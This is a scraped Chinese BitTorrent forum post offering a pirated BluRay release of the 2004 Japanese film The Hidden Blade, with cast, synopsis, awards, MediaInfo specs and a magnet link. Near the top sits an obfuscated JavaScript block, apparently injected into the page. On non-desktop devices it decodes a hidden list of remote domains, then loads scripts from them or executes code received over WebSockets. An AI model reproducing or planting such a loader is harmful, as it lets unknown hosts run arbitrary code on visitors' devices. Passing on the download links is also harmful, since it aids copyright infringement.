隐剑鬼爪[中文字幕]The.Hidden.Blade.2004.1080p.BluRay.DTS.x265-10bit-迅雷下载 16.84GB

版主小s 17天前 428

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 隐剑鬼爪 / The Hidden Blade

◎片 名 隠し剣 鬼の爪

◎年 代 2004

◎产 地 日本

◎类 别 剧情 / 爱情

◎语 言 日语

◎上映日期 2004-10-30(日本)

◎IMDb链接 https://www.imdb.com/title/tt0442286/

◎豆瓣评分 8.2/10 (6351人评价)

◎豆瓣链接 https://movie.douban.com/subject/1309005/

◎片 长 132分钟

◎导 演 山田洋次 Y?ji Yamada (id:1162794)

◎编 剧 山田洋次 Y?ji Yamada (id:1162794)

朝间义隆 Yoshitaka Asama (id:1277485)

藤泽周平 Shuuhei Fujisawa (id:1187510)

◎演 员 永濑正敏 Masatoshi Nagase (id:1010090)

松隆子 Takako Matsu (id:1003483)

吉冈秀隆 Hidetaka Yoshioka (id:1025610)

小泽征悦 Yukiyoshi Ozawa (id:1020068)

田畑智子 Tomoko Tabata (id:1017067)

倍赏千惠子 Chieko Baish? (id:1056635)

田中邦卫 Kunie Tanaka (id:1040946)

绫田俊树 Toshiki Ayata (id:1337259)

神户浩 Hiroshi Kanbe (id:1018934)

光本幸子 Sachiko Mitsumoto (id:1053239)

高岛礼子 Reiko Takashima (id:1025664)

前田淳 Jun Maeda (id:1418734)

赤冢真人 Makoto Akatsuka (id:1034536)

小市慢太郎 Mantar? Koichi (id:1007656)

北山雅康 Masayasu Kitayama (id:1004237)

松田洋治 Y?ji Matsuda (id:1028671)

松野太纪 Taiki Matsuno (id:1349056)

近藤公园 K?en Kond? (id:1029875)

香川耕二 Koji Kagawa (id:1390205)

笹野高史 Takashi Sasano (id:1012794)

田中泯 Min Tanaka (id:1298890)

小林稔侍 Nenji Kobayashi (id:1008326)

绪形拳 Ken Ogata (id:1009942)

富田勋 Isao Tomita (id:1046594)

长沼六男 Mutsuo Naganuma (id:1292872)

石井岩 Iwao Ishii (id:1287398)

平松惠美子 Emiko Hiramatsu (id:1305787)

◎标 签 山田洋次 / 日本 / 武士 / 日本电影 / 松隆子 / 爱情 / 2004 / 永濑正敏

◎简 介

时值德川幕府末期,海坂藩的下级武士片桐宗藏(永濑正敏 饰)和母亲(倍赏千惠子 饰)、妹妹志乃(田畑智子 饰),以及女佣希惠(松隆子 饰)过着清贫但安乐的生活。母亲过世后,妹妹嫁给了宗藏的好友岛田左门(吉冈秀隆 饰),而希惠却有个不好的婆家。 一日,宗藏偶与希惠在街头重逢,在得知她 倍受婆家人的欺虐后,他怒不可言,将她背回家中收留养病。宗藏心中对希惠尘封已久的爱恋又重新点燃,但他出于各种顾忌,却没敢表明真心。终于,希惠还是离开了宗藏回到家中。而宗藏的同门师兄弟兼好友狭间弥市郎(小泽征悦 饰)因秘密谋反,被捕后越狱出逃,宗藏受命前去追讨。身怀独门秘技隐剑鬼爪的宗藏,将与弥市郎展开一场生死之搏。

◎获奖情况 (共14项)

第55届柏林国际电影节 (2005)

金熊奖 最佳影片(提名)

└──山田洋次 (id:1162794)

第28届日本电影学院奖 (2005)

最佳影片(提名)

最佳导演(提名)

└──山田洋次 (id:1162794)

最佳编剧(提名)

└──山田洋次 (id:1162794)

└──朝间义隆 (id:1277485)

最佳男主角(提名)

└──永濑正敏 (id:1010090)

最佳女主角(提名)

└──松隆子 (id:1003483)

最佳男配角(提名)

└──吉冈秀隆 (id:1025610)

最佳配乐(提名)

└──富田勋 (id:1046594)

最佳摄影(提名)

└──长沼六男 (id:1292872)

最佳美术指导

└──西冈善信 (id:1013153)

└──出川三男 (id:1305779)

最佳照明(提名)

└──中冈源权 (id:1292905)

最佳录音(提名)

└──岸田和美 (id:1305843)

最佳剪辑(提名)

└──石井岩 (id:1287398)

第29届报知映画赏 (2004)

最佳女主角

└──松隆子 (id:1003483)

  1. General

  2. Unique ID : 202894661028121940142422913879569371968 (0x98A4171F6914D17B716C8880D0489340)

  3. Complete name : [email protected]OM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 16.8 GiB

  7. Duration : 2 h 12 min

  8. Overall bit rate : 18.3 Mb/s

  9. Movie name : The Hidden Blade 2004 1080p BluRay DTS [email protected]

  10. Encoded date : UTC 2021-07-12 00:16:42

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 12 min

  20. Bit rate : 16.7 Mb/s

  21. Width : 1 920 pixels

  22. Height : 1 036 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.351

  30. Stream size : 15.4 GiB (92%)

  31. Title : [email protected]

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 2 h 12 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.39 GiB (8%)

  50. Title : Japanese

  51. Language : Japanese

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 2 h 8 min

  61. Bit rate : 26.6 kb/s

  62. Count of elements : 2980

  63. Stream size : 24.4 MiB (0%)

  64. Title : CHS

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 2 h 8 min

  75. Bit rate : 27.3 kb/s

  76. Count of elements : 2980

  77. Stream size : 25.0 MiB (0%)

  78. Title : CHT

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Menu

  83. 00:00:00.000 : en:Chapter 01

  84. 00:07:05.467 : en:Chapter 02

  85. 00:13:02.490 : en:Chapter 03

  86. 00:19:07.563 : en:Chapter 04

  87. 00:26:11.487 : en:Chapter 05

  88. 00:31:25.300 : en:Chapter 06

  89. 00:35:19.909 : en:Chapter 07

  90. 00:44:12.233 : en:Chapter 08

  91. 00:52:54.421 : en:Chapter 09

  92. 00:59:40.410 : en:Chapter 10

  93. 01:07:10.151 : en:Chapter 11

  94. 01:13:24.609 : en:Chapter 12

  95. 01:24:29.898 : en:Chapter 13

  96. 01:31:38.493 : en:Chapter 14

  97. 01:48:09.483 : en:Chapter 15

  98. 01:53:52.075 : en:Chapter 16

  99. 01:58:26.224 : en:Chapter 17

  100. 02:02:42.230 : en:Chapter 18


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:4B9E0FF855CA5E94FC2BAB5F6FB730890B1F5ADA
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回